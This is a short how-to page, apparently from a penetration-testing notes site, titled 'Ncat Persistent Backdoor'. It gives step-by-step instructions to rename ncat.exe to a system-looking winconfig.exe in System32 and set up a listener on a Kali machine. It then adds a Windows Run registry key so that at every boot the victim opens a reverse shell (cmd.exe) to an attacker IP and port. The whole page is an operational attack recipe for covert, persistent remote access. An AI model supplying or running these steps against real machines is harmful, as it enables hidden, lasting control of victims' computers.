Ncat Persistent Backdoor
On victim, rename
ncat.exetowinconfig.exeand move it toC:\Windows\System32\winconfig.exeOn kali, set up a listener
ncat -l -p 5544 -vOn windows > Run >
regedit>Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> New > String Value >winconfig> Value data:"C:\Windows\System32\winconfig.exe 192.168.102.145 5544 -e cmd.exe"
Last updated
Was this helpful?